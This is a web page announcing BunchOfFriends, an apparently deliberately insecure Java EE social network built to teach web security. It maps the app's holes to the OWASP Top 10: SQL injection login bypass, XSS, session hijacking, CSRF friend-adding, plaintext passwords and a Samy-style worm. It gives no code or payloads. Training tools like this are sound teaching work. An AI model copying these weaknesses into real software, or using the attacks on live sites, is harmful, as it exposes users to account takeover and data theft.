Intentionally Insecure Web App

Updated 2015-09-25

BunchOfFriends (formerly named FriendFace) is an intentionally insecure social network to teach web security. It was developed for Java EE 7 and a Derby/JavaDB or MySQL database. It has been tested on the GlassFish 4.1 app server. It is designed to have many of the OWASP Top 10 vulnerabilities.

Download BunchOfFriends:

Before deployment: Create a JDBC resource named “jdbc/aip” (without the quotes). On each deployment, the application will automatically (re)create database tables and pre-populate them with sample data.

Requirements: JavaDB or MySQL is required (for other databases, you'll need to modify Java EE version 7 is required so you'll need GlassFish version 4.1 (or higher) or an equivalent application server. It should also work on GlassFish 4.0 if you upgrade GlassFish to use JSF/Mojarra version 2.2.2 or higher. One way to ensure these dependencies is to download the Java EE download bundle of Netbeans. In Netbeans, you can create JavaDB databases, launch GlassFish and open the domain admin console from the Services tab.

Purpose: I created the system while teaching a subject on advanced internet programming. It is intended to help teach a security mindset. Feel free to use it for any purpose. However, you should not deploy it on a publicly accessible server because it is so insecure.

License: Feel free to use it however you wish - it is under a Creative Commons Zero / Public Domain license.

BunchOfFriends is an alternative to the OWASP WebGoat project. WebGoat is tutorial oriented: it is a set of guided exercises. In contrast, BunchOfFriends is an ordinary application that is full of security holes.

BunchOfFriends can be used to re-create something like the “Samy” MySpace worm. You can create a profile that virally becomes friends with anybody who sees the profile name.

In the following is a discussion of how the OWASP Top 10 vulnerabilities relate to the application.

A1. Injection

SQL queries are not properly escaped. You can use SQL injection to log in without a valid password.

A2. Broken Authentication and Session Management

If cookies are disabled in your browser, Java will use URL rewriting to track your session in the unsecured URL. It is possible to use XSS and a third-party server to hijack a session of another user using Referrer headers.

A3. Cross-Site Scripting (XSS)

Most inputs/outputs in the application are not sanitized or escaped.

A4. Insecure Direct Object References

The application is vulnerable to URL editing. You can view the posts of somebody who is not a friend, without “friending” them.

A5. Security Misconfiguration

Pages for authenticated users are not properly secured. You can view the posts of a user, without logging in.

A6. Sensitive Data Exposure

The database stores passwords in plain-text. Username/passwords can be read by using a direct SQL connection to the database.

A7. Missing Function Level Access Control

The application does not have privileged users so this vulnerability is not applicable.

A8. Cross Site Request Forgery

You can create a third-party website that will automatically cause logged in users to add a friend.

A9. Using Components with Known Vulnerabilities

To my knowledge, the application is not vulnerable to this problem. Monitor the GlassFish application server mailing list for current vulnerabilities.

A10. Unvalidated Redirects and Forwards

The application does use a redirect that can be abused. However, I do not believe that it can be exploited in a way that couldn’t already be achieved by using direct URLs.

Published 28 December 2014 by Benjamin Johnston.